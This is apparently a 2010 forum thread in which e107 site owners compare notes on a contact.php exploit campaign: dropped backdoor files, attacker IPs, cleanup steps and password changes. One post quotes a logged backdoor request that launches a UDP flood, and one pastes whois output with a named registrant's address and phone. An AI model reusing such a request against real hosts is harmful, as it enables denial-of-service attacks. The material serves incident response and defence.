Contact form - Attack - Fixes

There are a few threads talking about the contact form being a problem, and hacks, and other issues. TO some it may appear as seperate issues.

I think there should be one thread to address them all. Maybe post a link to this thread?

Here's what I found, and what I did to solve it. If you don't agree, Add your fix below.

The exploit is to the contact.php page on certain servers.

#######
index.php
#######
I can tell if it's already happened if I look at my

index.php
\admin\index.php
\plugins\forum\index.php

I see it was edited recently. Mine had iframes inserted

I restored the originals via FTP.


#######
e107.pl et al
#######
I found a file (perl script) in my root that ran, looking for more sites to attack.

I read the e107.pl file and found some interesting reading.

I removed the e107.pl along with a number of other text and zipped files.

Here's my list. If you got hit, yours may be similar.

993698.txt
993698.txt.1
993698.txt.2
993698.txt.3
e107.pl
e107.pl.1
e107.pl.2
e107-rce-sites.txt
sendpage3.tar.gz
sendpage3.tar.gz.??

I downloaded them, then deleted from the root.

Others have mentioned different files such as help_us.php

All had the same date/time so check for other files around the same/date and time as these.

#######
contact.php
#######
I deleted it

##########
Contact Form Plugin
##########
http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.148

I installed this, and I checked my ADMIN-SITE LINKS to be sure Contact Us now pointed to this, and not to a contact.php.

This should work.

In another thread on this here;

[-link-]

deetrix mentioned a lot of files in cache. So, not sure but should probably also clear out e107's cache too. Just in case.

These aren't actually fixes for the contact.php itself, just clean-ups for malicious content that was added to sites before they ran the v0.7.22 update to contact.php etc.?

How are these .txt and .pl files getting uploaded?
Is it an exploit within e107 or elsewhere on the server?

Also is there any way to stop dodgy files being uploaded without having to upgrade your e107 sites?

I've got about 50 e107 sites and it would be an absolute nightmare to have to upgrade all of them.
Is there a quick fix?

As far as I know there is no fix atm... only preventative measures if you are not already compromised.

Read: [-link-]

Have 3 sites based on 0.7.22

They have been hit really hard: where normally I see 10 registered users at a max and as many robots/visitors, yesterday the total concurrent visit count exploded to a 200+

Not one file was added or modified (I CRC'd my site just before the attack started).

Finally, I redirected the access for contact.php and help_us.php "somewhere else".

I tried to check the apache web access log file to see what these bots where doing, but its size was way to big ^^

thx a lot...

from [-link-]

On an affected (0.7.19) site I cleaned all kinds off dynamic link folders with names like 1.txt, 2.txt, 3.txt
In the e107_files/cache I found phpinfo.php
In the root I found comeon.php, m22.php and u.php.
Make sure you get rid of these too!

You should really know better Henk and keep your sites up to date!

2dopey,

I considered it a fix because I had read elsewhere that some sites with v.7.22 had also had a problem. I don't know if they may have been hit before the upgrade, but until the dust settles I needed to remove the problem.

I was attacked a few years ago on one site for another reason. I'm still not sure how they got in, but I think it may have just been someone broke a password that was too simple.

Anyway, I "thought" I had cleaned up, but a few months later I was attacked again.

If you read about this current specific exploit, the problem lies with certain web server software as well as e107's contact.php form page.

Here's a few other things I would recommend if you have been compromised whether via the CMS or via the server.

1. Change your Hosting accounts password AND FTP passwords if different.

2. Change your mySQL password and the file that holds that information. (I changed my mySQL database name as well).

3. Change all Admins Passwords.

4. Check admins email addresses to be sure they are correct.

You may also want to change email passwords as well.

It may be overkill. It can be a lot of work. But it may save some work in the future. Once I did all this, and kept the site up-to-date, things are good.

Here are some of the IP's part of this attack:
213.17.153.11
75.125.205.82
195.199.243.114
204.10.38.244
193.226.30.130
91.199.120.11
212.227.118.21
195.249.40.23
78.138.88.234
79.14.43.2
84.247.49.62
212.227.118.21
87.229.24.67
206.174.210.10
85.94.197.34
87.210.197.1

I thought I was going crazy yesterday with my server and mysql dying on me the whole time. Reading this post this morning explained a lot to me.

There is a script running trying to access: "contact.php and help_us.php"

A quick fix would be for server admins to check apache logs and just firewall the IP's that attempt to connect to "help_us.php".

None of my sites have been compromised and I'm running various versions of e107... Only I am experiencing DDoS like activity.

e107 should have a way to change the default folders name (e107_plugin, e107_handlers...etc).
This way security would improve. I have donenthis.

AS I´ve informed e107 security team, I have mod security in Apache, and it prevent some of the attacks, which were logged.

Some of the files were
-e107_handlers/secure_img_render.php
-fpw.php
-e107_plugins/content/handlers/content_class.php
-e107_plugins/content/handlers/content_convert_class.php

Alll from the ip 78.46.72.235

Block this ip !!

for security sake I didn´t write the all query they tried to execute, but on a second though here is all the query from one of them (they were all the same) so your can check they are trying to upload a gif

If you have svn(subversion) installed (for those who can) you can check pretty quickly was has changed and what is new.

dolphin713,

Are you sure this is the same attack? Seems like different files than what the contact.php attack is about.

I did some ip lookups to see where they are. If you are sure they are the source, and not just infected systems, you could do a whois to find out who to report the abuse to maybe? In case it's an account, not an owner.

My host company shutdown my account for spam like activity.
They claim the a php script called rockarolla was the culprit.

There were a lot of GET & POST requests to contact.php and help_us.php in the Apache log.

Read the threads, you were compromised

Here is what I got

Ip addresses

89.188.136.25
217.23.14.79

Domain Name

"http://sabotaj.eu/"

New files

ooo.php
/.config.ini.php (attribute shown as 0000)
ola.tgz.1
ola.tgz

Whois led to

Domain: sabotaj

Registrant:
NOT DISCLOSED!
Visit "www .eurid .eu" for webbased whois.

Registrar Technical Contacts:
Name: Domain Manager
Organisation: " PublicDomainRegistry .com"
Language: en
Phone: +1.2013775952
Fax: +1.3202105146
Email:

Registrar:
Name: Directi Internet Solutions Pvt. Ltd. d/b/a "PublicDomainRegistry. com"
Website:"www. publicdomainregistry .com"

Nameservers:
"ns2 .butu r. net"
"ns1 .butur .net"

Keys:

Please visit "www. eurid. eu" for more info.

"www. Eurid. eu" Whois led to

Name sabotaj
Status REGISTERED (What this means)
How to dispute this registration
Registered October 8, 2009
Last update October 8, 2009, 5:15 pm
Registrant
Name ENES OKTAR
Organisation None
Language English
Address Atyk Veysel Cad 28/1 daire/9
06290 ankara
ankara-kacioren
Germany
+49 05073466556
Email "rocco-tie@msn. com"
Email "domain.manager @publicdomainregistry.com"
Registrar technical contacts
Name Domain Manager
Organisation "PublicDomainRegistry .com"
Language English
Address

14525 SW Milliken #48732
97005-2343 Beaverton
Oregon
United States


Phone +1.2013775952
FAX +1.3202105146
Registrar
Organisation Directi Internet Solutions Pvt. Ltd. d/b/a "PublicDomainRegistry. com"
Website "www. publicdomainregistry. com"
Nameservers
"ns2 .butur .net"
"ns1 .butur. net"

-------------------------------------------

Main script file is ooo.php which contains all the code for backdoor installation of other scriots and connect to server etc. Huge one as I was browsing through it.
Two tgz files contain the same script in compressed form.
.config.ini.php seems to be empty redirecting file.
The command that was logged in webserver are as follows

Mon Jun 7 03:33:37 2010: '/usr/bin/php /home/***/public_html/***/.config.ini.php ' (Exe: php [/usr/bin/php], Script: '/home/****/public_html.***/.config.ini.php', Domain: ***, Request: '/.config.ini.php?act=phptools&host=89.188.136.25&time=120&port=53&type=udp', Accessed from: 217.23.14.79) - of ****** has used 101.6 %CPU


All commands are in same format with same ip numbers.

e107 version was 0.7.17

I had updated main site to .22 but failed to update another one. Main site is ok but this one came under ddos attack. Though it was not production site as yet so no harm.

I have saved ooo.php file. If devs want to look at may be I can send it . It contains fully configured irc trojan. File searching, automated recursive dir , full mysql functions and connect to port 6667 , sends mail etc.
It contains following info

oded by Enqu!nx & TurkTegin
/* MAIL http://sabotaj. eu , http://sabotaj. eu

I don't know how this file or compressed files were uploaded as FTP seems intact.

Now I have deleted all files and fresh install for site .22 ver has been done. Will request admin to reactivate the site.